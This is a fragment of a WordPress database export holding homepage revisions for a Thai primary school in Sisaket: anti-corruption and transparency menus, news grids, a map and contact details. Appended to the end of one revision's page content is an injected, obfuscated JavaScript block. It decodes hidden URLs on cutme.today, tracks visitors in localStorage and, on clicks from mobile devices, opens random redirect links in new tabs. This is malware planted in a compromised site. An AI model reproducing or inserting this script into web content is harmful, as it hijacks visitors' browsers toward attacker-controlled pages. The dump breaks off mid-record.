gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 11:31:11','2024-08-02 04:31:11','',14,'http://pakhaeng.ssk.in.th/?p=482',0,'revision','',0),
(483,1,'2024-08-02 11:31:50','2024-08-02 04:31:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 